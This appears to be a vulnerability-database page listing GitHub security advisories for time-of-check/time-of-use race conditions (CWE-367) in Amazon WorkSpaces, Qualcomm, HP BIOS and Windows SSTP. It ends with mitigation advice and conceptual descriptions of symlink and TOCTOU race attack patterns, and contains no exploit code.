{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RP3M-V2VR-FVQ8
Vulnerability from github – Published: 2026-05-05 00:30 – Updated: 2026-05-05 00:30Improper privilege management in the log rotation mechanism of the Skylight Workspace Config Service in Amazon WorkSpaces for Windows before 2.6.2034.0 allows a local non-admin authenticated user to place arbitrary files into arbitrary locations bypassing file system permission protections, leading to local privilege escalation to SYSTEM.
{
"affected": [],
"aliases": [
"CVE-2026-7791"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-04T22:16:20Z",
"severity": "HIGH"
},
"details": "Improper privilege management in the log rotation mechanism of the Skylight Workspace Config Service in Amazon WorkSpaces for Windows before 2.6.2034.0 allows a local non-admin authenticated user to place arbitrary files into arbitrary locations bypassing file system permission protections, leading to local privilege escalation to SYSTEM.",
"id": "GHSA-rp3m-v2vr-fvq8",
"modified": "2026-05-05T00:30:22Z",
"published": "2026-05-05T00:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7791"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins/2026-025-aws"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RPJC-3979-F7MH
Vulnerability from github – Published: 2025-08-06 09:30 – Updated: 2025-08-06 09:30Memory corruption while processing simultaneous requests via escape path.
{
"affected": [],
"aliases": [
"CVE-2025-27076"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-06T08:15:30Z",
"severity": "HIGH"
},
"details": "Memory corruption while processing simultaneous requests via escape path.",
"id": "GHSA-rpjc-3979-f7mh",
"modified": "2025-08-06T09:30:37Z",
"published": "2025-08-06T09:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27076"
},
{
"type": "WEB",
"url": "https://docs.qualcomm.com/product/publicresources/securitybulletin/august-2025-bulletin.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RQ25-8PFW-784R
Vulnerability from github – Published: 2023-06-14 18:30 – Updated: 2024-04-04 04:50Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure.
{
"affected": [],
"aliases": [
"CVE-2022-31640"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-14T17:15:08Z",
"severity": "HIGH"
},
"details": "Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure.",
"id": "GHSA-rq25-8pfw-784r",
"modified": "2024-04-04T04:50:18Z",
"published": "2023-06-14T18:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31640"
},
{
"type": "WEB",
"url": "https://support.hp.com/us-en/document/ish_6662920-6662944-16/hpsbhf03805"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RQFH-7FX4-3747
Vulnerability from github – Published: 2022-12-13 21:30 – Updated: 2022-12-13 21:30Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-44676.
{
"affected": [],
"aliases": [
"CVE-2022-44670"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-13T19:15:00Z",
"severity": "HIGH"
},
"details": "Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-44676.",
"id": "GHSA-rqfh-7fx4-3747",
"modified": "2022-12-13T21:30:26Z",
"published": "2022-12-13T21:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-44670"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44670"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-44670"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
The most basic advice for TOCTOU vulnerabilities is to not perform a check before the use. This does not resolve the underlying issue of the execution of a function on a resource whose state and identity cannot be assured, but it does help to limit the false sense of security given by the check.
Mitigation
When the file being altered is owned by the current user and group, set the effective gid and uid to that of the current user and group when executing this statement.
Mitigation
Limit the interleaving of operations on files from multiple processes.
Mitigation
If you cannot perform operations atomically and you must share access to the resource between multiple processes or threads, then try to limit the amount of time (CPU cycles) between the check and use of the resource. This will not fix the problem, but it could make it more difficult for an attack to succeed.
Mitigation
Recheck the resource after the use call to verify that the action was taken appropriately.
Mitigation
Ensure that some environmental locking mechanism can be used to protect resources effectively.
Mitigation
Ensure that locking occurs before the check, as opposed to afterwards, such that the resource, as checked, is the same as it is when in use.
CAPEC-27: Leveraging Race Conditions via Symbolic Links
This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.
CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.